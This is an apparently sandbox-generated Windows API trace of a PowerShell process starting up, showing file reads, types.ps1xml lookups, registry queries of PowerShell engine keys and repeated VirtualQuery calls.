	[0292.537] ReadFile (in: hFile=0x32c, lpBuffer=0x2d057d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2d057d8*, lpNumberOfBytesRead=0x1cd628*=0x1000, lpOverlapped=0x0) returned 1
	[0292.537] ReadFile (in: hFile=0x32c, lpBuffer=0x2d057d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2d057d8*, lpNumberOfBytesRead=0x1cd628*=0x1000, lpOverlapped=0x0) returned 1
	[0292.537] ReadFile (in: hFile=0x32c, lpBuffer=0x2d057d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2d057d8*, lpNumberOfBytesRead=0x1cd628*=0x1000, lpOverlapped=0x0) returned 1
	[0292.538] ReadFile (in: hFile=0x32c, lpBuffer=0x2d057d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2d057d8*, lpNumberOfBytesRead=0x1cd628*=0x1000, lpOverlapped=0x0) returned 1
	[0292.538] ReadFile (in: hFile=0x32c, lpBuffer=0x2d057d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2d057d8*, lpNumberOfBytesRead=0x1cd628*=0x1000, lpOverlapped=0x0) returned 1
	[0292.538] ReadFile (in: hFile=0x32c, lpBuffer=0x2d057d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2d057d8*, lpNumberOfBytesRead=0x1cd628*=0x1000, lpOverlapped=0x0) returned 1
	[0292.538] ReadFile (in: hFile=0x32c, lpBuffer=0x2d057d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2d057d8*, lpNumberOfBytesRead=0x1cd628*=0x1000, lpOverlapped=0x0) returned 1
	[0292.539] ReadFile (in: hFile=0x32c, lpBuffer=0x2d057d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2d057d8*, lpNumberOfBytesRead=0x1cd628*=0x1000, lpOverlapped=0x0) returned 1
	[0292.539] ReadFile (in: hFile=0x32c, lpBuffer=0x2d057d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2d057d8*, lpNumberOfBytesRead=0x1cd628*=0x1000, lpOverlapped=0x0) returned 1
	[0292.539] ReadFile (in: hFile=0x32c, lpBuffer=0x2d057d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2d057d8*, lpNumberOfBytesRead=0x1cd628*=0x1000, lpOverlapped=0x0) returned 1
	[0292.539] ReadFile (in: hFile=0x32c, lpBuffer=0x2d057d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2d057d8*, lpNumberOfBytesRead=0x1cd628*=0x1000, lpOverlapped=0x0) returned 1
	[0292.540] ReadFile (in: hFile=0x32c, lpBuffer=0x2d057d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2d057d8*, lpNumberOfBytesRead=0x1cd628*=0x1000, lpOverlapped=0x0) returned 1
	[0292.540] ReadFile (in: hFile=0x32c, lpBuffer=0x2d057d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2d057d8*, lpNumberOfBytesRead=0x1cd628*=0x1000, lpOverlapped=0x0) returned 1
	[0292.540] ReadFile (in: hFile=0x32c, lpBuffer=0x2d057d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2d057d8*, lpNumberOfBytesRead=0x1cd628*=0x1000, lpOverlapped=0x0) returned 1
	[0292.542] ReadFile (in: hFile=0x32c, lpBuffer=0x2d057d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2d057d8*, lpNumberOfBytesRead=0x1cd628*=0x1000, lpOverlapped=0x0) returned 1
	[0292.543] ReadFile (in: hFile=0x32c, lpBuffer=0x2d057d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2d057d8*, lpNumberOfBytesRead=0x1cd628*=0x1000, lpOverlapped=0x0) returned 1
	[0292.543] ReadFile (in: hFile=0x32c, lpBuffer=0x2d057d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2d057d8*, lpNumberOfBytesRead=0x1cd628*=0x1000, lpOverlapped=0x0) returned 1
	[0292.543] ReadFile (in: hFile=0x32c, lpBuffer=0x2d057d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2d057d8*, lpNumberOfBytesRead=0x1cd628*=0x1000, lpOverlapped=0x0) returned 1
	[0292.543] ReadFile (in: hFile=0x32c, lpBuffer=0x2d057d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2d057d8*, lpNumberOfBytesRead=0x1cd628*=0x1000, lpOverlapped=0x0) returned 1
	[0292.544] ReadFile (in: hFile=0x32c, lpBuffer=0x2d057d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2d057d8*, lpNumberOfBytesRead=0x1cd628*=0x1000, lpOverlapped=0x0) returned 1
	[0292.544] ReadFile (in: hFile=0x32c, lpBuffer=0x2d057d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2d057d8*, lpNumberOfBytesRead=0x1cd628*=0x1000, lpOverlapped=0x0) returned 1
	[0292.544] ReadFile (in: hFile=0x32c, lpBuffer=0x2d057d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2d057d8*, lpNumberOfBytesRead=0x1cd628*=0x1000, lpOverlapped=0x0) returned 1
	[0292.544] ReadFile (in: hFile=0x32c, lpBuffer=0x2d057d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2d057d8*, lpNumberOfBytesRead=0x1cd628*=0x1b4, lpOverlapped=0x0) returned 1
	[0292.545] ReadFile (in: hFile=0x32c, lpBuffer=0x2d057d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd628, lpOverlapped=0x0 | out: lpBuffer=0x2d057d8*, lpNumberOfBytesRead=0x1cd628*=0x0, lpOverlapped=0x0) returned 1
	[0292.545] CloseHandle (hObject=0x32c) returned 1
	[0292.545] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0292.545] SetErrorMode (uMode=0x1) returned 0x1
	[0292.545] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd5a0 | out: lpFileInformation=0x1cd5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0292.545] SetErrorMode (uMode=0x1) returned 0x1
	[0292.545] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0292.545] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd688 | out: phkResult=0x1cd688*=0x32c) returned 0x0
	[0292.546] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd60c, lpData=0x0, lpcbData=0x1cd608*=0x0 | out: lpType=0x1cd60c*=0x1, lpData=0x0, lpcbData=0x1cd608*=0x56) returned 0x0
	[0292.546] CoTaskMemAlloc (cb=0x5a) returned 0x2def80
	[0292.546] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd5dc, lpData=0x2def80, lpcbData=0x1cd5d8*=0x56 | out: lpType=0x1cd5dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd5d8*=0x56) returned 0x0
	[0292.546] CoTaskMemFree (pv=0x2def80) 
	[0292.546] RegCloseKey (hKey=0x32c) returned 0x0
	[0292.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0292.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0294.368] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.370] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.371] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.371] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.371] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.371] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.372] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.374] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.903] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.903] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.903] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.903] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.903] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.903] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.904] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.904] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.910] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.916] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.916] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.916] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.917] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.917] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.917] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.917] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.921] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.516] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.516] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.516] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.516] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.517] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.518] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.519] VirtualQuery (in: lpAddress=0x1cc380, lpBuffer=0x1cd240, dwLength=0x30 | out: lpBuffer=0x1cd240*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.519] VirtualQuery (in: lpAddress=0x1cc380, lpBuffer=0x1cd240, dwLength=0x30 | out: lpBuffer=0x1cd240*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.519] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.520] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.541] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.541] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.541] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.545] CoTaskMemAlloc (cb=0x104) returned 0x2468a0
	[0295.545] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2468a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.545] CoTaskMemFree (pv=0x2468a0) 
	[0296.333] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.339] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.339] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.340] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.340] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.340] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.340] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.341] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.342] VirtualQuery (in: lpAddress=0x1cc370, lpBuffer=0x1cd230, dwLength=0x30 | out: lpBuffer=0x1cd230*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.342] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd828 | out: phkResult=0x1cd828*=0x300) returned 0x0
	[0296.342] RegQueryValueExW (in: hKey=0x300, lpValueName="path", lpReserved=0x0, lpType=0x1cd83c, lpData=0x0, lpcbData=0x1cd838*=0x0 | out: lpType=0x1cd83c*=0x1, lpData=0x0, lpcbData=0x1cd838*=0x74) returned 0x0
	[0296.342] RegQueryValueExW (in: hKey=0x300, lpValueName="path", lpReserved=0x0, lpType=0x1cd7ac, lpData=0x0, lpcbData=0x1cd7a8*=0x0 | out: lpType=0x1cd7ac*=0x1, lpData=0x0, lpcbData=0x1cd7a8*=0x74) returned 0x0
	[0296.342] CoTaskMemAlloc (cb=0x78) returned 0x290f40
	[0296.342] RegQueryValueExW (in: hKey=0x300, lpValueName="path", lpReserved=0x0, lpType=0x1cd77c, lpData=0x290f40, lpcbData=0x1cd778*=0x74 | out: lpType=0x1cd77c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x1cd778*=0x74) returned 0x0
	[0296.343] CoTaskMemFree (pv=0x290f40) 
	[0296.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x1cd4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0296.343] SetErrorMode (uMode=0x1) returned 0x1
	[0296.343] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1cd700 | out: lpFileInformation=0x1cd700*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0296.343] SetErrorMode (uMode=0x1) returned 0x1
	[0296.343] SetErrorMode (uMode=0x1) returned 0x1
